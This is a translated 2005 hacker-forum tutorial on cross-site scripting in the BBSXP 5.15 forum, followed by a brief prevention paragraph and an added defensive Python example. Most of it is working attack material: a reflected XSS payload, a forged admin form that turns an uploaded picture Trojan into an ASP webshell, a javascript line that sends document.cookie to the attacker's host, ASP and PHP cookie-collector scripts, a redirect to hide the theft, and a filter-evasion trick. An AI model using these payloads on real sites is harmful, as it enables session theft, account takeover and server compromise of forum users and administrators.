myhack58 | Anonymous (佚名) | MYHACK58:6220055903
History: Dec 29, 2005 - 12:00 a.m.

Original to this site: Hacker Animation Bar, Evanescent Water, "Analysis of cross-site attacks" - vulnerability warning - Black Bar Security Net (www.myhack58.com)


Analysis of cross-site attacks
Copyright belongs to the author. If you reproduce this, please credit Hacker Animation Bar, Evanescent Water (QQ: 278747467).
Recently everyone seems interested in cross-site attacks, so I will come along for the ride as well! What follows is just my own humble opinion.

If I have written anything wrong, please correct me!

What is a cross-site vulnerability? It has the same principle and purpose as the now more popular SQL injection: the programmer, when writing the program, does not fully filter some variables, or does no filtering at all, and passes user-submitted data straight into the statement that gets executed. A user can therefore submit specially constructed input, generally scripting code such as JavaScript, which is executed as soon as the service outputs it.

That is what we call a cross-site attack. Programs with a lot of human-computer interaction, such as forums and message boards, are relatively likely to contain cross-site scripting vulnerabilities.

How do you tell whether a program has a cross-site vulnerability? Analysing the program is the most direct method. Take the recently popular BBSXP 5.15 cross-site vulnerability: the experts have already described it in detail, so I will not go into it here. Put simply, cookies.asp contains this line:

Response.Cookies("skins")=""&Request("no")&""

and then setup.asp contains:

response.write "<html><head><meta http-equiv=Content-Type content=text/html;charset=gb2312></head>
<link href=images/skins/"&Request.Cookies("skins")&"/bbs.css rel=stylesheet><script src=inc/BBSxp.js></script>
<script src=inc/ybb.js></script><script src=images/skins/"&Request.Cookies("skins")&"/bbs.js></script>"

We can see that as long as we construct a "no" value that satisfies the skin condition and close the tag in front of it with ">", we can append our own <script> after it.

For example: http://xxx.xxxx.xxx/cookies.asp?menu=skins&no=4><script>document.write('<IFRAME marginWidth=100 marginHeight=100 src="http://www.baidu.com" frameBorder=100 width=0 scrolling=no height=0 to … gin="0"></IFRAME>');</script><script>

Submitting this achieves our cross-site purpose; I already have a demo of this in my animation.

With deeper use we can construct a form and trick the administrator into clicking our post, or join it. For example, we construct http://127.0.0.1/bbsxp/page2.asp?username=<body>

<form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">
<input value="/UploadFile/2005-5/200512365.jpg" name="yl">
<input value="database/haha.asp" name="bf">
</body></html>

Here /UploadFile/2005-5/200512365.jpg is your ASP picture Trojan.

So if we get the administrator to view our message, this script will automatically back up /UploadFile/2005-5/200512365.jpg as database/haha.asp, and we have our cute webshell. Why does it only work when the administrator views it? Because the server relies on cookie and session mechanisms.

The session is actually a file for each user under the server-side tmp directory that stores some variables; operating on the session is actually reading and writing that file. Each user has their own session, whose life cycle generally runs from the moment the user opens the browser until it is closed (or, for some browsers, until the connection to the site ends). The cookie is the storage mechanism on the user's side, and it requires the user to have cookie support enabled. That is why only the administrator has the right to back up our JPG as ASP.

What is more commonly used now is to steal cookies and then spoof the victim, or to use social engineering for further intrusion. For example, the following script that we construct can steal a user's cookie:

javascript:window.open('http://xxx.xxx.xxx/cookies.asp?msg='+document.cookie)

Here http://xxx.xxx.xxx/ is your own web space, cookies.asp is an ASP script for collecting, msg is the parameter passed back, and the parameter value we specify is document.cookie, that is, the cookie of the user who visits this page.

The code of cookies.asp is:

<%
testfile=Server.MapPath("hun.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
set thisfile=nothing
set fs=nothing
%>

So the cookies of all visitors are collected in the file hun.txt.

But when a visitor views our post, they also visit our website; doesn't that give the game away? Well, with a little processing it can look quite real. For example, we add the following code:

<script language=vbscript>
window.location.href="http://xxx.xxx.xxx"
</script>

This xxx.xxx.xxx is best set to the domain of the website you are attacking, so that while he visits our carefully constructed site he is taken at the same time to his own website. Isn't that more covert?

There is also a cookies.php that plays the same role as cookies.asp; its code is attached below:

<?php
$info = getenv("QUERY_STRING");
if ($info) {
    $fp = fopen("cookies.txt", "a");
    fwrite($fp, $info . "\n");
    fclose($fp);
}
?>
But most well-made forums filter out characters such as those in "javascript". There are still ways to take advantage: the JavaScript in the post can be written in ASCII codes, e.g. "j" can be written as its character code &#106;.

The prevention method is to filter characters such as javascript, <script>, ', ;, &, # and so on, provided of course that your web page still displays normally. I suggest you do not open unknown URLs, and that you do not use the same password for your mailbox, forums, QQ and other accounts, so that if one piece of information or one password is stolen it does not set off a chain reaction in which all your information and passwords end up in someone else's hands. That would require some profound social engineering.
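As a defender's illustration of the BBSXP skin reflection above, here is an added Python example (not code from the article or from BBSXP) that mirrors the unquoted concatenation in setup.asp and then shows the allowlist-plus-encoding fix the prevention advice calls for; the template is simplified and the numeric skin format is an assumption.

```python
import html
import re
from html.parser import HTMLParser

# Constructed payload with the shape the article uses for the BBSXP skin cookie.
PAYLOAD = "4><script>document.write('<IFRAME src=\"http://www.baidu.com\"></IFRAME>');</script><script>"
SKIN_RE = re.compile(r"[0-9]{1,3}")  # assumed allowlist: skins are picked by a short number

def render_setup_vulnerable(skin):
    """Mirrors the original setup.asp (template simplified): the cookie value is concatenated
    raw into unquoted attributes, so a '>' closes the tag and what follows is parsed as markup."""
    return ("<html><head></head>"
            f"<link href=images/skins/{skin}/bbs.css rel=stylesheet>"
            "<script src=inc/BBSxp.js></script><script src=inc/ybb.js></script>"
            f"<script src=images/skins/{skin}/bbs.js></script>")

def validate_skin(skin, default="1"):
    """Allowlist check: anything but a short decimal number falls back to the default."""
    return skin if SKIN_RE.fullmatch(skin) else default

def render_setup_hardened(skin):
    """Validate, then quote the attribute and entity-encode the value as defence in depth,
    so no character can end the attribute even if the allowlist is later relaxed."""
    safe = html.escape(validate_skin(skin), quote=True)
    return ("<html><head></head>"
            f'<link href="images/skins/{safe}/bbs.css" rel="stylesheet">'
            '<script src="inc/BBSxp.js"></script><script src="inc/ybb.js"></script>'
            f'<script src="images/skins/{safe}/bbs.js"></script>')

class _ScriptCollector(HTMLParser):
    # Records the src attribute (None when absent) of every <script> start tag.
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs.append(dict(attrs).get("src"))

def script_sources(document):
    parser = _ScriptCollector()
    parser.feed(document)
    return parser.srcs

def injects_script(document):
    """The template only emits <script> tags with a src; an inline script (no src)
    can therefore only have come from the reflected skin value."""
    return any(src is None for src in script_sources(document))
```

Running injects_script over both renderings with PAYLOAD shows the vulnerable page gaining inline script tags while the hardened page keeps exactly the three scripts of the template.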

To summarise: the tricks of cross-site attacks are very powerful, and with more experience everyone will get twice the result for half the effort. In many places this article borrows good ideas from domestic experts.

Because my ability is limited there are bound to be mistakes; please give me plenty of advice. I also take this opportunity to invite any master to add me for an exchange, QQ: 278747467. I look forward to the experts showing up!